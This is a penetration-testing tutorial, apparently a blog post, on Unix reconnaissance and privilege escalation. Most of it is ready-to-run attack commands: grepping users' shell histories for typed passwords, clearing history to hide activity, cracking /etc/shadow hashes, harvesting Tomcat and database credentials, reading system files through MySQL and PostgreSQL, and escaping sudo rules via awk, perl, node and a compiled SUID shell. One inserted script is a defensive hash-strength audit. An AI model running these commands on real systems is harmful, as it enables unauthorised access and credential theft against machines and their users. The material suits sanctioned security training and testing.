Unix/Linux Security: Essential Commands and Privilege Escalation Techniques

Mastering Unix/Linux systems is a critical skill for penetration testers and red teamers. From basic reconnaissance to privilege escalation, understanding how to navigate the command line, inspect system state, and exploit misconfigurations can reveal hidden vulnerabilities and expand your access within a target environment.

This guide covers essential Unix commands for system inspection, file extraction, database access, and privilege escalation - all crucial for reducing an organization's attack surface through proactive discovery.

Essential Unix Commands

Quickly gather system information:

  • Check logged-in users: w
  • List running processes: ps -edf
  • View command history: history or fc -l
  • Clear command history: history -c or fc -l -p
  • Disk usage: df -H
  • Memory usage: free -m
  • CPU and process monitor: top
  • Clear terminal: Ctrl + L
  • End file input (in cat > file.txt): Ctrl + D
  • Suspend a process: Ctrl + Z

Reconnaissance Hints

  • If a user's home directory is missing from /home, check /etc/passwd for the correct path.
  • Search user history files for accidental password exposure:
find /home -name .bash_history -exec grep -A 1 passwd {} \;

This catches the classic mistake where a user runs passwd and then types the new password at the shell prompt instead of at the password prompt, so it is recorded in the history file on the following line.

Extracting Backup Files

Root may leave sensitive backups in temporary directories. Extract them using:

# .tgz file
tar zxvf backup.tgz
# .tbz or .tar.bz2 file
tar -xjf backup.tbz
# .bz2 file
bzip2 -d backup.bz2

Always check /tmp and /var/tmp for leftover files.

Analyze Cron Scripts and Configuration Files

If root runs a daily backup script via /etc/cron.daily/, it may contain hardcoded keys or use symmetric encryption. Extract readable strings:

strings /etc/cron.daily/backup-script.sh

This can reveal passwords, encryption keys, or API tokens.

Cracking Password Hashes from /etc/shadow

Use John the Ripper to crack hashes:

john --format=[FORMAT] shadow.txt

Identify hash types:

  • $1$ -> MD5
  • $2a$ or $2y$ -> Blowfish (bcrypt)
  • $5$ -> SHA-256
  • $6$ -> SHA-512
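Added example, not from the original article: a small shell audit that applies the prefix table above to shadow-format lines and reports which accounts still use md5-crypt or have an empty password field. It also recognises $2b$ (bcrypt) and $y$ (yescrypt) prefixes that the table omits; the sample lines are constructed.

```bash
#!/usr/bin/env bash
# Map one /etc/shadow password field to its crypt algorithm by its $id$
# prefix (the table above, plus $2b$ bcrypt and $y$ yescrypt) and mark
# the states an auditor should act on.
classify_hash() {
    case "$1" in
        '')                        echo "empty (passwordless login may be possible)" ;;
        '!'*|'*'*)                 echo "locked" ;;
        '$1$'*)                    echo "md5-crypt (weak, migrate)" ;;
        '$2a$'*|'$2b$'*|'$2y$'*)   echo "bcrypt" ;;
        '$5$'*)                    echo "sha256-crypt" ;;
        '$6$'*)                    echo "sha512-crypt" ;;
        '$y$'*)                    echo "yescrypt" ;;
        *)                         echo "unknown" ;;
    esac
}

# Print "user  algorithm" for every shadow-format line read from stdin.
audit_shadow() {
    local user hash rest
    while IFS=: read -r user hash rest; do
        printf '%-10s %s\n' "$user" "$(classify_hash "$hash")"
    done
}

# Print only the accounts that need attention: empty fields and md5-crypt.
weak_accounts() {
    local user hash rest
    while IFS=: read -r user hash rest; do
        case "$(classify_hash "$hash")" in
            empty*|md5-crypt*) echo "$user" ;;
        esac
    done
}

# Constructed sample shadow lines (not from any real system; hash bodies are placeholders).
SAMPLE_SHADOW='root:$6$saltsalt$placeholderhash:19600:0:99999:7:::
legacy:$1$abcdefgh$placeholderhash:19600:0:99999:7:::
svc:!*:19600:0:99999:7:::
guest::19600:0:99999:7:::'

printf '%s\n' "$SAMPLE_SHADOW" | audit_shadow
echo "--- accounts to fix ---"
printf '%s\n' "$SAMPLE_SHADOW" | weak_accounts
```

On a real host, pipe /etc/shadow (readable only by root) into audit_shadow or weak_accounts instead of the sample.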

For MySQL SHA-1 hashes:

john --format=mysql-sha1 hashes.txt

Tomcat: Extract Admin Credentials

Tomcat admin credentials are often stored in:

/etc/tomcat*/tomcat-users.xml

Search and extract:

find /etc -name tomcat-users.xml -exec grep -A 1 admin {} \;

MySQL: Access and Extract Data

Connect as root (if no password is set):

mysql -u root

Common commands:

show databases;
use [DATABASE];
show tables;
select * from [TABLE];

To read files from the filesystem (this needs the FILE privilege, and the server's secure_file_priv setting restricts load_file() to a directory such as /var/lib/mysql-files, a common default):

select load_file("/var/lib/mysql-files/key.txt");

If you find the MySQL user table (user.MYD), use strings to extract password hashes:

strings /var/lib/mysql/mysql/user.MYD | grep -A 1 root

PostgreSQL: Basic Commands

Connect to PostgreSQL:

psql

Useful commands:

  • \list - List databases
  • \c [DATABASE] - Connect to a database
  • \d - List tables
  • select * from users; - Query user table

Read Web Application Source Code

Web apps are typically located in /var/www. Inspect configuration files for database credentials:

cat /var/www/html/config.php

Once you have database access, you can read arbitrary files using the following; on PostgreSQL 11 and later this requires superuser rights or membership in the pg_read_server_files role, because COPY FROM a file runs with the database server's OS permissions:

CREATE TABLE demo(t text);
COPY demo FROM '/etc/passwd';
SELECT * FROM demo;

Privilege Escalation Techniques

Check what commands you can run as other users:

sudo -l

Example output:

User pentesterlab may run the following commands on server:
    (victim) /bin/bash

If allowed, gain a shell as victim:

sudo -u victim /bin/bash

Using find

sudo -u victim find / -name "key.txt" -exec cat {} \;

Using less

sudo -u victim less /home/victim/key.txt

Using awk

sudo -u victim awk '{print $0}' /home/victim/key.txt

Or spawn a shell:

sudo -u victim awk '{system("/bin/bash")}'

Using chmod and cp

If you can copy files and set permissions, create a SUID/SGID binary (1001 is assumed to be victim's uid and gid):

echo '#include <stdlib.h>
#include <unistd.h>
int main(){setgid(1001);setuid(1001);system("/bin/sh");}' > shell.c
gcc -o /tmp/shell shell.c
sudo -u victim cp /tmp/shell /home/victim/
chmod +sx /home/victim/shell
/home/victim/shell

Using perl

sudo -u victim perl -e 'print `cat /etc/passwd`'

Using node

sudo -u victim node -e "var exec = require('child_process').exec; exec('cat /home/victim/key.txt', function (error, stdout, stderr){console.log(stdout);});"

See Also

  • Reconnaissance: Advanced OSINT and Code Review Techniques
  • Greenbone OpenVAS Installation

Published on Aug 21, 2025